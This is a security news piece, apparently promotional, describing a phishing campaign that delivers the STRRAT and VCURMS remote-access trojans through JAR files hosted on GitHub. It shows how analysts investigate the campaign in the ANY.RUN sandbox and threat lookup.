Hackers Deploy STRRAT & VCURMS Malware on Windows Via GitHub

A new phishing campaign targets users with emails containing a button to “verify payment information.” Clicking the button triggers the download of a malicious JAR file (disguised as an invoice) that leverages a PowerShell command to download two additional JARs. 

The JARs deploy the STRRAT and VCURMS RATs, granting attackers remote access and keylogging capabilities and credential theft from browsers, applications, Discord, Steam, etc. In contrast, VCURMS can also download further modules to expand its information-stealing functionality.

The attackers use AWS or Github to store the malware, obfuscate the initial JAR file, and employ commercial protection to bypass detection. 

Finding the attack in ANY.RUN’s Threat Intelligence Lookup

The Threat Intelligence Lookup feature of ANY.RUN allows you to investigate suspicious campaigns.

 By crafting a query that combines specific rule names and domain names (e.g., “RuleName:”strrat” AND DomainName:”github.com””), analysts can identify relevant sandbox sessions where the suspicious behavior (STRRAT) was observed interacting with a particular domain (github.com). 

The lookup presents two key results: a table with interactive analysis sessions (left side) that can be used to examine malware behavior in a safe environment and a list of malicious executables (right side) downloadable for further analysis or to check logs for potential compromises.

To learn more about the sample’s habits and extract more IOCs, let’s play back a recording of an online research session. To keep up with this research session, you may just browse to it.

Analyzing the attack in ANY.RUN’s Sandbox

ANY.RUN is a cloud-based sandbox environment for analyzing suspicious files. It utilizes YARA and Suricata rules to detect malware within 40 seconds of uploading. 

Analysts can then directly interact with the sandboxed environment to observe malware behavior and collect indicators of compromise (IOCs), empowering security teams to collaboratively investigate threats and efficiently respond to emerging and persistent attacks. 

The analysis begins by examining the tags in the ANY.RUN sandbox, which revealed the presence of STRRAT malware.

The Connections tab is used to identify a connection from javaw.exe to GitHub, potentially linking the sample to a more extensive campaign.

To collect IOCs, the user utilizes the dedicated IOC button within ANY.RUN, providing valuable information for security teams to update their systems and continue their investigation.

The session highlights ANY.RUN’s capability to extract malware configuration, automatically decrypt embedded strings, and reveal details like persistence mechanisms and Command & Control (C2) server locations saves analysts significant time and effort compared to manual reverse engineering. 

Get a personalized demo of ANY.RUN for your team to see how it can benefit and contribute to your organization’s security – Schedule a call today.